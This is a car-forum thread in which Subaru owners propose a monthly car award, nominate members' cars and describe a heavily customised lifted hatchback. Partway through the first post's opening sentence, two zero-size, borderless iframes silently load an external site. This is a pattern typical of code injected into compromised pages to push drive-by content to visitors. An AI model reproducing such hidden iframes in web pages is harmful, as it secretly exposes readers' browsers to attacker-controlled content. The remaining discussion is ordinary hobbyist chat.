CAR OF THE MONTH (SEPTEMBER)

i think it would be pretty cool to have a car of the month award.. i dont think prizes would really be neccesary but maybe this is something the moderators want too set up.. i think we should all<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME><IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> throw in our nominees and then have a poll near the end of sept.

im gonna throw fujis name in there just because his car sounds so badass

It IS an awesome idea. And just to show that I'm a team player, I'll even sacrifice my own car to be the first car of the month. I'm willing to do that for you people... because I care. :lol:

If we do this, I actually do nominate 2.5 freek for the first car of the month, because he is selling his pride and joy, and because it looks sick as he!!

I would like to nominate the silver WRX that was in a crash recently. I think it was Neefs' WRX. Hit by a drunk driver.

It was a good lookin car and was in one of the magazine's as well.

 

im not saying i didnt like his car but since it doesnt exist anymore i dont think it should be winning anymore awards

 

I think it's a good idea, but it's the wrong way to do it. No thread. Make it so when you go to mnsubaru.com (not the forums) there's a few pics of cars, then buttons by all of them, we can vote for maybe a week or so and see who comes out on top. Just an idea..

 

OK, well, that's up to the mods, but we could use this thread to nominate a few cars, then make a poll to find the winner. THEN, post the winner on the main page, or maybe just have the winner start a thread with pics and a description of their car.

I nominate archemitis (even though he doesn't post much) and his H6 powered, 4" lifted hatch, riding on big wide 6 lug wheels...

 

I'll put in a vote for Freeks scoob, nice looking ride.

 

k thanks for the nominees.. im planning on doing exactly what chux said and just seeing who we watn on the poll.. then in about a week we can create a poll with the more popular ones..i really want people to speak out and nominate the cars they really like.

Id love to nominate someone but i don't really know what cars everyone has, since there is no easy way to check out pics of everyones cars. So i will just say i nominate anyone else on here with a turboed GC8, so i guess let's see a couple pics?

I second the nomination!

He did everything himself at his own shop (with some help of course ). Bought the raw steel, choped and welded to build the 4" lift. Pulled, swaped in, wired up, and figured out which clutch/flywheel/pressureplate/throwout bearing for the ER27 engine swap. Made a special center punch, bought the proper 14mm drill bit, new studs, and lugnuts for the 6 lug hub conversion. Threw down the $$$ for new 28" Yokohama Geolandar tires on aluminum Toyota rims. Again bought the raw steel, choped, and welded up the front bumper which also holds the radiator forward enough to make room for the H6 engine. Custom cowl induction hood, custom stereo/guage plate, the list really goes on and on for all the custom stuff on that sick hatch.

 

I was going to nominate a WRX owner I met who impressed me with his intellect when he boasted that his floppy rear wing was more functional than the stock poser wings on Evos.

Last I saw, he was wearing a halo. Something about a curve in Nebraska, going through a cinderblock building, and a fire. And a totalled WRX.

But I think that mudding car wins. Maybe we need an owner of the month???

I doubt it unless anybody happened to take a picture. But next time I run in to him, I should ask him if anybody got any pics. Like the EMS that dragged him from his burning car.

He did have a passenger, though.
